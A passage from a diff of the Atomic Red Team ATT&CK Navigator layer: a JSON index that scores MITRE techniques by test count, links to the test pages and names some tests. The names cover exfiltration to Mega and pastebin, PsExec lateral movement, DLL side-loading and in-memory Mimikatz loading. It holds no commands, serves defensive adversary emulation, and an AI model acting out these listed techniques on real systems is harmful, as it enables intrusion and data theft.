Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over 
SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- 
WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 0b26e0b412..40c896b57c 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View 
